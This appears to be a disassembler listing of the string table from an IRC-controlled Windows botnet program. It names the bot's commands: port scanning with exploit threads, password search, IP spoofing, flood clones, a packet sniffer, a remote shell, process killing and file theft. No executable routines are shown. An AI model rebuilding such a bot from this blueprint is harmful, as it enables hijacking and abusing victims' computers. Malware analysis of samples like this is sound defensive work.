aFailedToStar_5 db '- Failed to start server thread, error: <%d>.',0
align 4
; char aHttpserver[]
aHttpserver db 'httpserver',0 ; DATA XREF: sub_401CC7+1B1E�o
align 4
; char aHttp[]
aHttp db 'http',0 ; DATA XREF: sub_401CC7+1B33�o
align 10h
; char asc_440F60[]
asc_440F60 db '-' ; DATA XREF: sub_401CC7+2245�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerListen_0 db ' Server listening on IP: %s:%d, Directory: %s\.',0
; char asc_440F9C[]
asc_440F9C db '-' ; DATA XREF: sub_401CC7+22B0�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToStar_6 db ' Failed to start server thread, error: <%d>.',0
align 4
; char aTftpserver[]
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_401CC7+1B48�o
align 4
; char aTftp[]
aTftp db 'tftp',0 ; DATA XREF: sub_401CC7+1B5D�o
align 4
unk_440FEC db 2Dh ; - ; DATA XREF: sub_401CC7+201A�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aAlreadyRunni_0 db ' Already running.',0
align 4
; char asc_44100C[]
asc_44100C db '-' ; DATA XREF: sub_401CC7+20CF�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aServerStarte_1 db ' Server started on Port: %d, File: %s.',0
align 10h
unk_441040 db 2Dh ; - ; DATA XREF: sub_401CC7+213E�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToStar_7 db ' Failed to start server thread, error: <%d>.',0
align 4
; char aCrash[]
aCrash db 'crash',0 ; DATA XREF: sub_401CC7+1B72�o
align 4
; char asc_441084[]
asc_441084 db '-' ; DATA XREF: sub_401CC7+1B88�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 73617243h, 676E6968h, 746F6220h
dd 2Eh
aCrash_0 db 'crash',0 ; DATA XREF: sub_401CC7+1BC2�o
align 4
; char aScanall[]
aScanall db 'scanall',0 ; DATA XREF: sub_401CC7+1BD8�o
; char aSa[]
aSa db 'sa',0 ; DATA XREF: sub_401CC7+1BED�o
align 4
; char asc_4410B4[]
asc_4410B4 db '-' ; DATA XREF: sub_401CC7+1D5E�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aAlreadyDScanni db '- Already %d scanning threads. Too many specified.',0
unk_4410F4 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_403CCB�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToStar_8 db '- Failed to start scan, port is invalid.',0
align 4
aRandom db 'Random',0 ; DATA XREF: sub_401CC7+1F11�o
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_401CC7+1F18�o
align 10h
; char asc_441140[]
asc_441140 db '-' ; DATA XREF: sub_401CC7+1F43�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aSPortScanStart db '- %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
align 4
; char asc_4411AC[]
asc_4411AC db '-' ; DATA XREF: sub_401CC7+1FB4�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToStar_9 db '- Failed to start scan thread, error: <%d>.',0
align 4
; char aPhonehome[]
aPhonehome db 'phonehome',0 ; DATA XREF: sub_401CC7+1C02�o
align 4
; char aNoticeSPhoning[]
aNoticeSPhoning db 'NOTICE %s :PHONING HOME: hi ;).',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+1C19�o
align 4
; char aFindpass[]
aFindpass db 'findpass',0 ; DATA XREF: sub_401CC7+1C2C�o
align 4
; char aFp[]
aFp db 'fp',0 ; DATA XREF: sub_401CC7+1C3D�o
align 4
; char asc_441228[]
asc_441228 db '-' ; DATA XREF: sub_401CC7+1C86�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aSearchingForPa db 'Searching for password.',0
unk_441250 db 2Dh ; - ; DATA XREF: sub_401CC7+1D00�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToSta_10 db 'Failed to start search thread, error: <%d>.',0
; char aSpoof[]
aSpoof db 'spoof',0 ; DATA XREF: sub_401CC7+19DC�o
align 4
; char Str2[]
Str2 db 'off',0 ; DATA XREF: sub_401CC7+19F3�o
; char asc_441298[]
asc_441298 db '-' ; DATA XREF: sub_401CC7+1A0E�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingDisabl db ' Spoofing disabled.',0
; char aGet_2[]
aGet_2 db 'get',0 ; DATA XREF: sub_401CC7:loc_404C0D�o
unk_4412C4 db 2Dh ; - ; DATA XREF: sub_401CC7+2F68�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingCurren db ' Spoofing currently set to ',27h,'%s',27h,'.',0
align 4
; char aD_D_D_[]
aD_D_D_ db '%d.%d.%d.*',0 ; DATA XREF: sub_401CC7+2FC1�o
align 4
unk_441308 db 2Dh ; - ; DATA XREF: sub_401CC7+2FD6�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingCurr_0 db ' Spoofing currently set to ',27h,'%s',27h,'.',0
align 10h
unk_441340 db 2Dh ; - ; DATA XREF: sub_401CC7+2FEA�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSIsAnInvalidIp db ' ',27h,'%s',27h,' is an invalid IP address.',0
; char asc_441374[]
asc_441374 db '-' ; DATA XREF: sub_401CC7+3008�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofIpSetToS_ db ' Spoof IP set to ',27h,'%s',27h,'.',0
align 10h
; char aExploit[]
aExploit db 'exploit',0 ; DATA XREF: sub_401CC7+3022�o
; char asc_4413A8[]
asc_4413A8 db '-' ; DATA XREF: sub_401CC7+30A8�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aAttemptingToCo db '- attempting to compromise %s...',0
align 4
unk_4413D8 db 2Dh ; - ; DATA XREF: sub_401CC7+311A�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFailedToStartE db '- Failed to start exploiter thread, error: <%d>.',0
align 4
; char aReconnect_in[]
aReconnect_in db 'reconnect.in',0 ; DATA XREF: sub_401CC7+3125�o
align 4
; char aRin[]
aRin db 'rin',0 ; DATA XREF: sub_401CC7+313A�o
; char aQuitReconnec_1[]
aQuitReconnec_1 db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401CC7:loc_409A82�o
align 4
; char asc_441444[]
asc_441444 db '-' ; DATA XREF: sub_401CC7+7DD3�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReconnectingIn db 'Reconnecting in %s seconds',0
align 4
; char aReconnect_in_m[]
aReconnect_in_m db 'reconnect.in.ms',0 ; DATA XREF: sub_401CC7+314F�o
; char aRinms[]
aRinms db 'rinms',0 ; DATA XREF: sub_401CC7+3164�o
align 4
; char aQuitReconnec_0[]
aQuitReconnec_0 db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401CC7:loc_409A3A�o
align 4
; char asc_44149C[]
asc_44149C db '-' ; DATA XREF: sub_401CC7+7D8B�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReconnecting_0 db 'Reconnecting in %s ms',0
align 10h
; char aFlood[]
aFlood db 'flood',0 ; DATA XREF: sub_401CC7+317B�o
align 4
; char aLoad[]
aLoad db 'load',0 ; DATA XREF: sub_401CC7+31A4�o
align 10h
; char asc_4414D0[]
asc_4414D0 db '-' ; DATA XREF: sub_401CC7+31FB�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aSClonesLoadedT db '- %s clones loaded to %s:%s',0
align 4
; char aPm_1[]
aPm_1 db 'pm',0 ; DATA XREF: sub_401CC7+322D�o
align 10h
; char asc_441500[]
asc_441500: ; DATA XREF: sub_401CC7+3248�o
unicode 0, < >,0
; char a__7[]
a__7: ; DATA XREF: sub_401CC7+324D�o
unicode 0, <_>,0
; char aPrivmsgSS[]
aPrivmsgSS db 'privmsg %s :%s',0 ; DATA XREF: sub_401CC7+327C�o
align 4
; char aCt[]
aCt db 'ct',0 ; DATA XREF: sub_401CC7+3299�o
align 4
; char asc_44151C[]
asc_44151C: ; DATA XREF: sub_401CC7+32B4�o
unicode 0, < >,0
; char a_[]
a_: ; DATA XREF: sub_401CC7+32B9�o
unicode 0, <_>,0
; char aPrivmsgS[]
aPrivmsgS db 'privmsg %s :' ; DATA XREF: sub_401CC7+32E8�o
dd 1732501h, 0
; char aNt_1[]
aNt_1 db 'nt',0 ; DATA XREF: sub_401CC7+3305�o
align 4
; char asc_44153C[]
asc_44153C: ; DATA XREF: sub_401CC7+3320�o
unicode 0, < >,0
; char a__8[]
a__8: ; DATA XREF: sub_401CC7+3325�o
unicode 0, <_>,0
; char aNoticeSS_1[]
aNoticeSS_1 db 'notice %s :%s',0 ; DATA XREF: sub_401CC7+3354�o
align 4
; char aMode[]
aMode db 'mode',0 ; DATA XREF: sub_401CC7+3371�o
align 4
; char asc_44155C[]
asc_44155C: ; DATA XREF: sub_401CC7+338C�o
unicode 0, < >,0
; char a__0[]
a__0: ; DATA XREF: sub_401CC7+3391�o
unicode 0, <_>,0
; char aModeSS[]
aModeSS db 'mode %s %s',0 ; DATA XREF: sub_401CC7+33C0�o
align 10h
; char aJoin[]
aJoin db 'join',0 ; DATA XREF: sub_401CC7+33DD�o
align 4
; char aJoinS[]
aJoinS db 'join %s',0 ; DATA XREF: sub_401CC7+33FF�o
; char aPart_1[]
aPart_1 db 'part',0 ; DATA XREF: sub_401CC7+341C�o
align 4
; char aPartS[]
aPartS db 'part %s',0 ; DATA XREF: sub_401CC7+343E�o
; char aPartflood[]
aPartflood db 'partflood',0 ; DATA XREF: sub_401CC7+345B�o
align 4
; char aPartSS[]
aPartSS db 'part %s %s',0 ; DATA XREF: sub_401CC7+3482�o
align 4
; char aPnick[]
aPnick db 'pnick',0 ; DATA XREF: sub_401CC7+349F�o
align 10h
; char aSI[]
aSI db '%s%i',0 ; DATA XREF: sub_401CC7+34E0�o
align 4
; char aNickS_0[]
aNickS_0 db 'NICK %s',0 ; DATA XREF: sub_401CC7+34FB�o
; char aJoinPart[]
aJoinPart db 'join/part',0 ; DATA XREF: sub_401CC7+3518�o
align 4
; char aJoinS_0[]
aJoinS_0 db 'join %s',0 ; DATA XREF: sub_401CC7+3546�o
; char aPartSS_0[]
aPartSS_0 db 'part %s %s',0 ; DATA XREF: sub_401CC7+3572�o
align 10h
; char aJoinS_1[]
aJoinS_1 db 'join %s',0 ; DATA XREF: sub_401CC7+35A9�o
; char aPartSS_1[]
aPartSS_1 db 'part %s %s',0 ; DATA XREF: sub_401CC7+35E5�o
align 4
; char aJoinS_2[]
aJoinS_2 db 'join %s',0 ; DATA XREF: sub_401CC7+360C�o
; char aPartSS_2[]
aPartSS_2 db 'part %s %s',0 ; DATA XREF: sub_401CC7+3648�o
align 4
; char aDcc[]
aDcc db 'dcc',0 ; DATA XREF: sub_401CC7+3665�o
; char aPrivmsgS_0[]
aPrivmsgS_0 db 'PRIVMSG %s :' ; DATA XREF: sub_401CC7+36E2�o
dd 43434401h, 4E455320h, 64252044h, 2064252Eh, 25206425h
dd 64252064h, 1
; char aNick_0[]
aNick_0 db 'nick',0 ; DATA XREF: sub_401CC7+36FF�o
align 4
; char aJoinS_3[]
aJoinS_3 db 'join %s',0 ; DATA XREF: sub_401CC7+3729�o
; char aNickS_1[]
aNickS_1 db 'NICK %s',0 ; DATA XREF: sub_401CC7+375C�o
; char aNickS_2[]
aNickS_2 db 'NICK %s',0 ; DATA XREF: sub_401CC7+37A0�o
; char aNickS_3[]
aNickS_3 db 'NICK %s',0 ; DATA XREF: sub_401CC7+37E4�o
; char aChgnick[]
aChgnick db 'chgnick',0 ; DATA XREF: sub_401CC7+3801�o
; char aNickS_4[]
aNickS_4 db 'NICK %s',0 ; DATA XREF: sub_401CC7+382B�o
; char aMsg[]
aMsg db 'msg',0 ; DATA XREF: sub_401CC7+3848�o
; char aJoinS_4[]
aJoinS_4 db 'join %s',0 ; DATA XREF: sub_401CC7+3876�o
; char aPrivmsgSS_0[]
aPrivmsgSS_0 db 'privmsg %s :%s',0 ; DATA XREF: sub_401CC7+38A2�o
align 4
; char aPrivmsgSS_1[]
aPrivmsgSS_1 db 'privmsg %s :%s',0 ; DATA XREF: sub_401CC7+38DE�o
align 4
; char aPrivmsgSS_2[]
aPrivmsgSS_2 db 'privmsg %s :%s',0 ; DATA XREF: sub_401CC7+391A�o
align 4
; char aNotice_2[]
aNotice_2 db 'notice',0 ; DATA XREF: sub_401CC7+3937�o
align 10h
; char aJoinS_5[]
aJoinS_5 db 'join %s',0 ; DATA XREF: sub_401CC7+3965�o
; char aNoticeSS_2[]
aNoticeSS_2 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401CC7+3991�o
align 4
; char aNoticeSS_3[]
aNoticeSS_3 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401CC7+39CD�o
align 4
; char aNoticeSS_4[]
aNoticeSS_4 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401CC7+3A09�o
align 4
; char aCtcp[]
aCtcp db 'ctcp',0 ; DATA XREF: sub_401CC7+3A26�o
align 10h
; char aJoinS_6[]
aJoinS_6 db 'join %s',0 ; DATA XREF: sub_401CC7+3A54�o
; char aPrivmsgS_1[]
aPrivmsgS_1 db 'PRIVMSG %s :' ; DATA XREF: sub_401CC7+3A7B�o
dd 6E697001h, 167h
; char aPrivmsgS_2[]
aPrivmsgS_2 db 'PRIVMSG %s :' ; DATA XREF: sub_401CC7+3AB2�o
dd 72657601h, 6E6F6973h, 1
; char aPrivmsgS_3[]
aPrivmsgS_3 db 'PRIVMSG %s :' ; DATA XREF: sub_401CC7+3AE9�o
dd 6E696601h, 1726567h, 0
; char aPrivmsgS_4[]
aPrivmsgS_4 db 'PRIVMSG %s :' ; DATA XREF: sub_401CC7+3B20�o
dd 6E696601h, 1726567h, 0
; char aMix[]
aMix db 'mix',0 ; DATA XREF: sub_401CC7+3B3D�o
; char aJoinS_7[]
aJoinS_7 db 'join %s',0 ; DATA XREF: sub_401CC7+3B6B�o
; char aPrivmsgS_5[]
aPrivmsgS_5 db 'PRIVMSG %s :' ; DATA XREF: sub_401CC7+3B92�o
dd 6E697001h, 167h
; char aNoticeSS_5[]
aNoticeSS_5 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401CC7+3BCE�o
align 4
; char aPrivmsgSS_3[]
aPrivmsgSS_3 db 'PRIVMSG %s :%s',0 ; DATA XREF: sub_401CC7+3C0A�o
align 4
; char aNoticeSS_6[]
aNoticeSS_6 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401CC7+3C46�o
align 4
; char aRegister[]
aRegister db 'register',0 ; DATA XREF: sub_401CC7+3C63�o
align 10h
; char aNickservRegist[]
aNickservRegist db 'nickserv register %s %s',0 ; DATA XREF: sub_401CC7+3C8C�o
; char aOff_0[]
aOff_0 db 'off',0 ; DATA XREF: sub_401CC7+3CA9�o
unk_4417CC db 2Dh ; - ; DATA XREF: sub_401CC7+3CF0�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aDisconnectingC db '- disconnecting clones...',0
align 4
; char aNick_1[]
aNick_1 db 'nick',0 ; DATA XREF: sub_401CC7+3D0F�o
align 4
; char aN[]
aN: ; DATA XREF: sub_401CC7+3D24�o
unicode 0, <n>,0
; char aNickS_7[]
aNickS_7 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7D56�o
align 4
unk_44180C db 2Dh ; - ; DATA XREF: sub_401CC7+7D69�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aNickChangedToS db 'Nick changed to: ',27h,'%s',27h,'.',0
align 10h
; char aJoin_0[]
aJoin_0 db 'join',0 ; DATA XREF: sub_401CC7+3D39�o
align 4
; char aJ[]
aJ: ; DATA XREF: sub_401CC7+3D4E�o
unicode 0, <j>,0
; char aJoinSS_3[]
aJoinSS_3 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7D36�o
align 4
unk_44184C db 2Dh ; - ; DATA XREF: sub_401CC7+7D49�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aJoinedChanne_0 db 'Joined channel: ',27h,'%s',27h,'.',0
align 10h
; char aPart_2[]
aPart_2 db 'part',0 ; DATA XREF: sub_401CC7+3D63�o
align 4
; char aPt[]
aPt db 'pt',0 ; DATA XREF: sub_401CC7+3D78�o
align 4
; char aPartS_2[]
aPartS_2 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7D0F�o
align 4
unk_441888 db 2Dh ; - ; DATA XREF: sub_401CC7+7D22�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPartedChannelS db 'Parted channel: ',27h,'%s',27h,'.',0
align 4
; char aRaw[]
aRaw db 'raw',0 ; DATA XREF: sub_401CC7+3D8D�o
; char aR_2[]
aR_2 db 'r',0 ; DATA XREF: sub_401CC7+3DA2�o
align 4
; char aS_20[]
aS_20 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7CF1�o
align 4
dword_4418BC dd 234032Dh, 6E69616Dh, 202D0302h, 20435249h, 3A776152h
; DATA XREF: sub_401CC7+7D02�o
dd 2E732520h, 0
; char aKillthread[]
aKillthread db 'killthread',0 ; DATA XREF: sub_401CC7+3DB7�o
align 4
; char aK[]
aK: ; DATA XREF: sub_401CC7+3DCC�o
unicode 0, <k>,0
; char aAll[]
aAll db 'all',0 ; DATA XREF: sub_401CC7+7BD3�o
unk_4418EC db 2Dh ; - ; DATA XREF: sub_401CC7+7BED�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aStoppedDThread db '- Stopped: %d thread(s).',0
align 4
; char asc_441914[]
asc_441914 db '-' ; DATA XREF: sub_401CC7:loc_4098BE�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aNoActiveThread db '- No active threads found.',0
unk_44193C db 2Dh ; - ; DATA XREF: sub_401CC7+7C78�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aKilledThreadS_ db '- Killed thread: %s.',0
align 10h
; char asc_441960[]
asc_441960 db '-' ; DATA XREF: sub_401CC7:loc_409946�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToKillTh db '- Failed to kill thread: %s.',0
align 4
; char aC_quit[]
aC_quit db 'c_quit',0 ; DATA XREF: sub_401CC7+3DE1�o
align 4
; char aC_q[]
aC_q db 'c_q',0 ; DATA XREF: sub_401CC7+3DF6�o
; char aQuitLater_0[]
aQuitLater_0 db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7B46�o
align 4
; char aC_rndnick[]
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_401CC7+3E0B�o
align 4
; char aC_rn[]
aC_rn db 'c_rn',0 ; DATA XREF: sub_401CC7+3E20�o
align 4
; char aNickS_6[]
aNickS_6 db 'NICK %s',0 ; DATA XREF: sub_401CC7+7B03�o
aS_19 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7B18�o
align 4
; char aPrefix[]
aPrefix db 'prefix',0 ; DATA XREF: sub_401CC7+3E35�o
align 4
; char aPr[]
aPr db 'pr',0 ; DATA XREF: sub_401CC7+3E4A�o
align 4
unk_4419D8 db 2Dh ; - ; DATA XREF: sub_401CC7+7ABA�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPrefixChangedT db 'Prefix changed to: ',27h,'%c',27h,'.',0
align 10h
; char aOpen[]
aOpen db 'open',0 ; DATA XREF: sub_401CC7+3E5F�o
align 4
; char aO[]
aO: ; DATA XREF: sub_401CC7+3E74�o
unicode 0, <o>,0
aOpen_1 db 'open',0 ; DATA XREF: sub_401CC7+7A84�o
align 4
unk_441A14 db 2Dh ; - ; DATA XREF: sub_401CC7+7A97�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFileOpenedS db ' File opened: %s',0
align 4
unk_441A34 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_409768�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s',0
; char aServer_5[]
aServer_5 db 'server',0 ; DATA XREF: sub_401CC7+3E89�o
align 10h
; char aSe[]
aSe db 'se',0 ; DATA XREF: sub_401CC7+3E9E�o
align 4
unk_441A64 db 2Dh ; - ; DATA XREF: sub_401CC7+7A73�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aServerChangedT db 'Server changed to: ',27h,'%s',27h,'.',0
align 4
; char aDns[]
aDns db 'dns',0 ; DATA XREF: sub_401CC7+3EB3�o
; char aDn[]
aDn db 'dn',0 ; DATA XREF: sub_401CC7+3EC8�o
align 4
; char asc_441A94[]
asc_441A94 db '-' ; DATA XREF: sub_401CC7+7A1C�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aLookupSS_ db '- Lookup: %s -> %s.',0
align 4
unk_441AB4 db 2Dh ; - ; DATA XREF: sub_401CC7+7A4F�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aLookupSS__0 db '- Lookup: %s -> %s.',0
align 4
unk_441AD4 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_40971D�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aCouldnTResol_0 db '- Couldn',27h,'t resolve hostname.',0
align 4
; char aKillproc[]
aKillproc db 'killproc',0 ; DATA XREF: sub_401CC7+3EDD�o
align 4
; char aKp[]
aKp db 'kp',0 ; DATA XREF: sub_401CC7+3EF2�o
align 4
unk_441B0C db 2Dh ; - ; DATA XREF: sub_401CC7+79DB�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledS db ' Process killed: %s',0
unk_441B2C db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4096AC�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTermin db ' Failed to terminate process: %s',0
align 4
; char aKill[]
aKill db 'kill',0 ; DATA XREF: sub_401CC7+3F07�o
align 4
; char aKi[]
aKi db 'ki',0 ; DATA XREF: sub_401CC7+3F1C�o
align 4
unk_441B68 db 2Dh ; - ; DATA XREF: sub_401CC7+797A�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledI db ' Process killed ID: %s',0
align 4
; char asc_441B8C[]
asc_441B8C db '-' ; DATA XREF: sub_401CC7:loc_409648�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTerm_0 db ' Failed to terminate process ID: %s',0
; char aDelete[]
aDelete db 'delete',0 ; DATA XREF: sub_401CC7+3F31�o
align 4
; char aDel[]
aDel db 'del',0 ; DATA XREF: sub_401CC7+3F46�o
; char asc_441BC8[]
asc_441BC8 db '-' ; DATA XREF: sub_401CC7+793A�o
db 3, 34h, 2
dd 656C6966h, 202D0302h, 656C6544h, 20646574h, 27732527h
dd 2Eh
dword_441BE4 dd 234032Dh, 656C6966h, 2D0302h ; DATA XREF: sub_401CC7:loc_409616�o
; char aGet_3[]
aGet_3 db 'get',0 ; DATA XREF: sub_401CC7+3F5B�o
; char aGt[]
aGt db 'gt',0 ; DATA XREF: sub_401CC7+3F70�o
align 4
; char aS_33[]
aS_33 db '%s',0 ; DATA XREF: sub_401CC7+7853�o
align 4
; char asc_441BFC[]
asc_441BFC db '-' ; DATA XREF: sub_401CC7+78AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aSendFileSUserS db '- Send File: %s, User: %s.',0
unk_441C20 db 2Dh ; - ; DATA XREF: sub_401CC7+791A�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_11 db '- Failed to start transfer thread, error: <%d>.',0
align 4
; char aList[]
aList db 'list',0 ; DATA XREF: sub_401CC7+3F85�o
align 4
; char aLi[]
aLi db 'li',0 ; DATA XREF: sub_401CC7+3F9A�o
align 4
dword_441C68 dd 234032Dh, 656C6966h, 202D0302h, 7473694Ch, 7325203Ah
; DATA XREF: sub_401CC7+782E�o
dd 0
; char aVisit[]
aVisit db 'visit',0 ; DATA XREF: sub_401CC7+3FAF�o
align 4
; char aV[]
aV: ; DATA XREF: sub_401CC7+3FC4�o
unicode 0, <v>,0
; char asc_441C8C[]
asc_441C8C db '-' ; DATA XREF: sub_401CC7+778E�o
db 3, 34h, 2
dd 69736976h, 2D030274h, 4C525520h, 7325203Ah, 2Eh
; char asc_441CA4[]
asc_441CA4 db '-' ; DATA XREF: sub_401CC7+77FD�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToSta_12 db ' Failed to start connection thread, error: <%d>.',0
align 4
; char aMirccmd[]
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_401CC7+3FD9�o
; char aMirc[]
aMirc db 'mirc',0 ; DATA XREF: sub_401CC7+3FEE�o
align 4
unk_441CF4 db 2Dh ; - ; DATA XREF: sub_401CC7+7714�o
db 3, 34h, 2
db 6Dh ; m
db 69h, 72h, 63h
db 2
db 3, 2Dh, 20h
aClientNotOpen_ db 'Client not open.',0
align 4
dword_441D14 dd 234032Dh, 6372696Dh, 202D0302h, 6D6D6F43h, 20646E61h
; DATA XREF: sub_401CC7:loc_4093E2�o
dd 746E6573h, 2Eh
; char aCmd[]
aCmd db 'cmd',0 ; DATA XREF: sub_401CC7+4003�o
; char aCm[]
aCm db 'cm',0 ; DATA XREF: sub_401CC7+4018�o
align 4
; char asc_441D38[]
asc_441D38 db 0Ah,0 ; DATA XREF: sub_401CC7+76A1�o
align 4
; char asc_441D3C[]
asc_441D3C db '-' ; DATA XREF: sub_401CC7+76B9�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aErrorSendingTo db '- Error sending to remote shell.',0
align 4
; char asc_441D68[]
asc_441D68 db '-' ; DATA XREF: sub_401CC7+76D8�o
db 3, 34h, 2
dd 2646D63h, 43202D03h, 616D6D6Fh, 3A73646Eh, 732520h
; char aReadfile[]
aReadfile db 'readfile',0 ; DATA XREF: sub_401CC7+402D�o
align 4
; char aRf[]
aRf db 'rf',0 ; DATA XREF: sub_401CC7+4042�o
align 10h
; char aR_0[]
aR_0: ; DATA XREF: sub_401CC7:loc_4092CB�o
unicode 0, <r>,0
unk_441D94 db 2Dh ; - ; DATA XREF: sub_401CC7+766A�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReadFileComple db 'Read file complete: %s',0
align 4
unk_441DB8 db 2Dh ; - ; DATA XREF: sub_401CC7+7677�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReadFileFailed db 'Read file failed: %s',0
align 4
; char aPsniff[]
aPsniff db 'psniff',0 ; DATA XREF: sub_401CC7+4057�o
align 4
; char aOn[]
aOn db 'on',0 ; DATA XREF: sub_401CC7+406E�o
align 4
dword_441DE8 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401CC7+408E�o
aAlreadyRunni_1 db '- Already running.',0
align 4
; char asc_441E08[]
asc_441E08 db '-' ; DATA XREF: sub_401CC7+40F5�o
db 3, 34h, 2
dd 696E7370h, 3026666h
